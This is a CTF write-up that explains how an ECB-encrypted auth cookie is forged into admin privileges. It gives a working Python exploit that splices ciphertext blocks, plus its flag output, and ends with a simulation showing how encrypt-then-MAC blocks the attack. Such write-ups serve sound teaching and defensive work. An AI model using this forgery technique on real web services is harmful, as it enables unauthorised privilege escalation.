A cookie encrypted in ECB mode lets an attacker forge admin privileges: because each block is encrypted independently, ciphertext blocks can be rearranged and the server still decrypts them into a valid-looking cookie.

Solution

Here’s our solution:

import requests

host = "http://problems.ctfx.io:7001/"
#host = "http://localhost:3000/"
# Field lengths are tuned to the server's cookie layout so that the pieces
# we want to keep fall on 16-byte block boundaries.
evil_params = {'username': 'AAAAAAAAAAAAAAA', 'password': 'BBBBBBBBBBB',
               'dmin': 1, 'a': 1}

def chunk(d, sz):
    # Split the cookie into sz-character pieces (32 chars = one 16-byte block,
    # assuming the cookie is hex-encoded).
    return [d[i:i+sz] for i in range(0, len(d), sz)]

def main():
    s = requests.Session()
    s.post(host + "login", data=evil_params)
    auth = s.cookies.get("auth")
    auth_chunks = chunk(auth, 32)
    # ECB decrypts every block on its own, so blocks can be recombined freely.
    reveal = "".join((auth_chunks[0], auth_chunks[1], auth_chunks[4]))
    s.cookies.set("auth", reveal)
    flag_text = s.get(host).text
    for i in flag_text.split("\n"):
        if "Flag" in i:
            print(i)

if __name__ == "__main__":
    main()

Running the script:

amon@Evanna:~/ctf/ctfx/crypto/customauth$ python exploit.py
        <span><b>Flag: </b><code>ctf(ecb_m0de_too_Ez?)</code></span>

Flag: ctf(ecb_m0de_too_Ez?)
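As an added illustration that is not part of the original writeup, here is a self-contained simulation of why the block shuffle works and what closes it: ECB encrypts each 16-byte block independently, so ciphertext blocks can be permuted and still decrypt cleanly, whereas a cookie sealed with an HMAC over the ciphertext is rejected before decryption if any block has moved. The block cipher is a toy Feistel construction over SHA-256 standing in for AES (so no extra library is needed), and the keys and cookie contents are constructed.

```python
import hashlib
import hmac

BLOCK = 16

def _feistel(key: bytes, block: bytes, rounds) -> bytes:
    # Toy 16-byte Feistel cipher (SHA-256 round function), a stand-in for AES.
    L, R = block[:8], block[8:]
    for i in rounds:
        f = hashlib.sha256(key + bytes([i]) + R).digest()[:8]
        L, R = R, bytes(x ^ y for x, y in zip(L, f))
    return R + L

def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    pad = BLOCK - len(data) % BLOCK
    data += bytes([pad]) * pad                                # PKCS#7 padding
    return b"".join(_feistel(key, data[i:i + BLOCK], range(4))
                    for i in range(0, len(data), BLOCK))      # each block alone

def ecb_decrypt(key: bytes, data: bytes) -> bytes:
    pt = b"".join(_feistel(key, data[i:i + BLOCK], range(3, -1, -1))
                  for i in range(0, len(data), BLOCK))
    return pt[:-pt[-1]]                                       # strip padding

def reorder_blocks(ct: bytes, order) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(blocks[i] for i in order)

def seal(enc_key: bytes, mac_key: bytes, data: bytes) -> bytes:
    # Encrypt-then-MAC: the tag covers the whole ciphertext, so moved blocks fail.
    ct = ecb_encrypt(enc_key, data)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def unseal(enc_key: bytes, mac_key: bytes, token: bytes):
    ct, tag = token[:-32], token[-32:]
    expected = hmac.new(mac_key, ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None                                           # reject, never decrypt
    return ecb_decrypt(enc_key, ct)

COOKIE = b"user=alice;role=" + b"guest;theme=dark"   # constructed: two exact blocks

def demo():
    ek, mk = b"enc-key-demo", b"mac-key-demo"                # constructed keys
    swapped = reorder_blocks(ecb_encrypt(ek, COOKIE), [1, 0, 2])  # pad block last
    token = seal(ek, mk, COOKIE)
    tampered = reorder_blocks(token[:-32], [1, 0, 2]) + token[-32:]
    return ecb_decrypt(ek, swapped), unseal(ek, mk, token), unseal(ek, mk, tampered)
```

`demo()` returns the cleanly decrypted but block-swapped plaintext from plain ECB, the original cookie from a valid sealed token, and `None` for the sealed token whose blocks were swapped.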
